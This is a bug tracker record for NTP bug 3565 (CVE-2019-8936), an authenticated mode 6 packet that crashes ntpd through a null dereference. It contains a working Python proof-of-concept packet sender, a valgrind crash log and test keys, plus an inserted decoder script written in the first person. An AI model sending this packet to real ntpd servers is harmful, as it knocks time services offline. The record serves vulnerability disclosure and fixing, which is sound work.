NTP users are strongly urged to take immediate action to ensure that their NTP daemons are not susceptible to being used in distributed denial-of-service (DDoS) attacks. Please also take this opportunity to defeat denial-of-service attacks by implementing Ingress and Egress filtering through BCP38.

ntp-4.2.8p18 was released on 25 May 2024 and addresses 40 bugs and provides 40 improvements.

Please see the NTP 4.2.8p18 Changelog for details.

Bug 3565 - Crafted null dereference attack in authenticated mode 6 packet
Summary: Crafted null dereference attack in authenticated mode 6 packet
Status: RESOLVED FIXED
Alias: None
Product: ntp
Classification: Unclassified
Component: ntpd
Version: 4.2.8
Hardware: PC All
Importance: P2 major
Assignee: Juergen Perlinger
URL:
Duplicates: 3568
Depends on:
Blocks:

Reported: 2019-01-15 23:37 UTC by Harlan Stenn
Modified: 2019-03-07 12:40 UTC
CC: 2 users

See Also:
Flags: stenn: blocking4.2.8+

Description Harlan Stenn 2019-01-15 23:37:36 UTC

    
Comment 1 Harlan Stenn 2019-01-15 23:49:51 UTC
An authenticated attacker can cause ntpd to sigsegv by triggering a NULL pointer exception.

Embargo offered until 15 April 2019.

Proof of concept:

#!/usr/bin/env python
import sys
import socket

buf = ("\x16\x03\x00\x03\x00\x00\x00\x00\x00\x00\x00\x04\x6c\x65\x61\x70" +
       "\x00\x00\x00\x01\x5c\xb7\x3c\xdc\x9f\x5c\x1e\x6a\xc5\x9b\xdf\xf5" +
       "\x56\xc8\x07\xd4")

sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.sendto(buf, ('127.0.0.1', 123))

Crash report:

$ sudo valgrind ./ntpd/ntpd -n -c /home/magnus/resources/ntp.conf
==21159== Memcheck, a memory error detector
==21159== Copyright (C) 2002-2013, and GNU GPL'd, by Julian Seward et al.
==21159== Using Valgrind-3.10.0 and LibVEX; rerun with -h for copyright info
==21159== Command: ./ntpd/ntpd -n -c /home/magnus/resources/ntp.conf
==21159== 
15 Jan 21:17:45 ntpd[21159]: ntpd 4.2.8p12@1.3728-o Tue Jan 15 12:39:50 UTC 2019 (1): Starting
15 Jan 21:17:45 ntpd[21159]: Command line: ./ntpd/ntpd -n -c /home/magnus/resources/ntp.conf
15 Jan 21:17:45 ntpd[21159]: proto: precision = 1.338 usec (-19)
15 Jan 21:17:45 ntpd[21159]: switching logging to file /tmp/ntp.log
15 Jan 21:17:46 ntpd[21159]: Listen and drop on 0 v6wildcard [::]:123
15 Jan 21:17:46 ntpd[21159]: Listen and drop on 1 v4wildcard 0.0.0.0:123
15 Jan 21:17:46 ntpd[21159]: Listen normally on 2 lo 127.0.0.1:123
15 Jan 21:17:46 ntpd[21159]: Listen normally on 3 eth0 192.168.245.230:123
15 Jan 21:17:46 ntpd[21159]: Listen normally on 4 lo [::1]:123
15 Jan 21:17:46 ntpd[21159]: Listen normally on 5 eth0 [fe80::50:56ff:fe38:d7b8%2]:123
15 Jan 21:17:46 ntpd[21159]: Listening on routing socket on fd #22 for interface updates
15 Jan 21:17:46 ntpd[21159]: kernel reports TIME_ERROR: 0x41: Clock Unsynchronized
15 Jan 21:17:46 ntpd[21159]: kernel reports TIME_ERROR: 0x41: Clock Unsynchronized
==21159== Invalid read of size 1
==21159==    at 0x133E60: write_variables (ntp_control.c:3467)
==21159==    by 0x147539: receive (ntp_proto.c:690)
==21159==    by 0x12C8CD: ntpdmain (ntpd.c:1442)
==21159==    by 0x5FE4B44: (below main) (libc-start.c:287)
==21159==  Address 0x0 is not stack'd, malloc'd or (recently) free'd
==21159== 
==21159== 
==21159== Process terminating with default action of signal 11 (SIGSEGV)
==21159==  Access not within mapped region at address 0x0
==21159==    at 0x133E60: write_variables (ntp_control.c:3467)
==21159==    by 0x147539: receive (ntp_proto.c:690)
==21159==    by 0x12C8CD: ntpdmain (ntpd.c:1442)
==21159==    by 0x5FE4B44: (below main) (libc-start.c:287)
==21159==  If you believe this happened as a result of a stack
==21159==  overflow in your program's main thread (unlikely but
==21159==  possible), you can try to increase the size of the
==21159==  main thread stack using the --main-stacksize= flag.
==21159==  The main thread stack size used in this run was 204800.
==21159== 
==21159== HEAP SUMMARY:
==21159==     in use at exit: 120,503 bytes in 2,646 blocks
==21159==   total heap usage: 2,785 allocs, 139 frees, 397,278 bytes allocated
==21159== 
==21159== LEAK SUMMARY:
==21159==    definitely lost: 0 bytes in 0 blocks
==21159==    indirectly lost: 0 bytes in 0 blocks
==21159==      possibly lost: 3,134 bytes in 4 blocks
==21159==    still reachable: 117,369 bytes in 2,642 blocks
==21159==         suppressed: 0 bytes in 0 blocks
==21159== Rerun with --leak-check=full to see details of leaked memory
==21159== 
==21159== For counts of detected and suppressed errors, rerun with: -v
==21159== ERROR SUMMARY: 1 errors from 1 contexts (suppressed: 0 from 0)

Configuration:

$ cat ~/resources/ntp.conf 
logfile /tmp/ntp.log
restrict 127.0.0.1
keys /home/magnus/resources/keys
trustedkey 1
controlkey 1
requestkey 1

$ cat /home/magnus/resources/keys 
1 M gurka
2 M agurk
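The packet the proof of concept sends, decoded field by field, as an added example that is not code from the bug report or from ntpd: it shows a version 2, mode 6 WRITEVAR request carrying the bare variable name `leap` with no `=value`, followed by key id 1 and a 16-byte MD5 MAC, which is why only a holder of the control key can reach write_variables() this way. The packet bytes and the key `1 M gurka` are copied from the report above; the field layout is the NTP control message format (RFC 1305 Appendix B), and `md5_mac_valid()` implements ntpd's MD5 MAC construction as I understand it.

```python
"""Decode the mode 6 (control) packet from the bug 3565 proof of concept.
Added example, not part of the bug report or of ntpd; packet bytes and the
key "1 M gurka" are copied from the report (layout: RFC 1305 App. B)."""
import hashlib
import struct

# The 36 bytes the proof of concept sends to udp/123, copied from the report.
POC_PACKET = bytes.fromhex("160300030000000000000004" "6c656170" "00000001"
                           "5cb73cdc9f5c1e6ac59bdff556c807d4")
KEY_GURKA = b"gurka"      # key 1, type M (MD5), from the report's keys file
CTL_OP_WRITEVAR = 3       # request opcode dispatched to write_variables()

def parse_control_packet(pkt):
    """Return (header dict, payload bytes, key id or None, digest bytes)."""
    if len(pkt) < 12:
        raise ValueError("shorter than the 12-byte control header")
    b0, b1, seq, status, assoc, offset, count = struct.unpack("!BBHHHHH", pkt[:12])
    hdr = {"version": (b0 >> 3) & 7, "mode": b0 & 7, "opcode": b1 & 0x1F,
           "response": bool(b1 & 0x80), "error": bool(b1 & 0x40), "more": bool(b1 & 0x20),
           "sequence": seq, "status": status, "association": assoc, "offset": offset, "count": count}
    if 12 + count > len(pkt):
        raise ValueError("count field exceeds packet length")
    hdr["mac_offset"] = 12 + ((count + 3) & ~3)  # data padded to 4 bytes before MAC
    trailer = pkt[hdr["mac_offset"]:]
    if not trailer:                               # unauthenticated request
        return hdr, pkt[12:12 + count], None, b""
    if len(trailer) < 4:
        raise ValueError("truncated MAC trailer")
    return hdr, pkt[12:12 + count], struct.unpack("!I", trailer[:4])[0], trailer[4:]

def split_variables(payload):
    """'a=1,b' -> [('a', '1'), ('b', None)]; None marks a name sent without '='."""
    pairs = []
    for item in payload.decode("ascii", "replace").split(","):
        if item.strip():
            name, sep, value = item.partition("=")
            pairs.append((name.strip(), value.strip() if sep else None))
    return pairs

def md5_mac_valid(pkt, key):
    """ntpd's MD5 MAC is MD5(key || everything before the key id)."""
    hdr, _, keyid, digest = parse_control_packet(pkt)
    return keyid is not None and hashlib.md5(key + pkt[:hdr["mac_offset"]]).digest() == digest

def valueless_writes(pkt):
    """Variable names a WRITEVAR request carries with no value; [] for other opcodes."""
    hdr, payload, _, _ = parse_control_packet(pkt)
    if hdr["opcode"] != CTL_OP_WRITEVAR:
        return []
    return [name for name, value in split_variables(payload) if value is None]
```

Run against captured udp/123 traffic, `valueless_writes()` picks out exactly the request shape in this report, and `md5_mac_valid()` tells you whether it was sent by someone holding the control key.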
Comment 2 Magnus Stubman 2019-01-16 09:22:07 UTC
I'd like to note that I discovered this issue while researching vulnerabilities in ntpsec, not ntp.
The issue was therefore reported to the ntpsec team in October last year, and an update was released on the 13th of January. As such, the issue, as it was found in ntpsec, has already been made public.

For more, visit https://dumpco.re/bugs/ntpsec-authed-npe
Comment 3 Magnus Stubman 2019-01-16 19:40:29 UTC
The bug report I sent to ntpsec can be found here: https://gitlab.com/NTPsec/ntpsec/issues/509
Comment 4 Juergen Perlinger 2019-01-16 20:52:16 UTC
@Magnus: With all the hints you gave, that was easy enough to reproduce and hunt down. Thanks, a three thumbs up.

@Harlan: The repo is in
   psp.ntp.org:~perlinger/ntp-stable-3565

!NOTE! This is based on your pre-p13 staging repo! (I wanted to make sure the bug is still alive in the current source tree...)

After the changes, the daemon survives the POC attack, so I think it fixes the trouble we have here. If you want me to upload a patch, too, please tell me.
Comment 5 Harlan Stenn 2019-01-16 21:26:18 UTC
Thanks, Pearly!

We now need a better title for this bug.  Ideas for something better than:

 Possible null pointer dereference on authenticated mode 6 packets

We also need to decide what else will go in to p13.

We'll then need to get everything documented and packaged, and then we can schedule the release to advance-notification partners.
Comment 6 Juergen Perlinger 2019-01-24 22:36:36 UTC
*** Bug 3568 has been marked as a duplicate of this bug. ***
Comment 7 Harlan Stenn 2019-02-19 05:02:51 UTC
STAGED for ntp-4.2.8p13
Comment 8 Magnus Stubman 2019-03-03 11:44:00 UTC
Has this issue been assigned a CVE identifier?
Comment 9 Harlan Stenn 2019-03-07 12:40:22 UTC
Magnus, thanks for your report and patch.  Please check ntp-4.2.8p13 and mark this bug as VERIFIED or REOPENED, as appropriate.

This bug has been assigned http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-8936

Pearly, thanks for your work on this.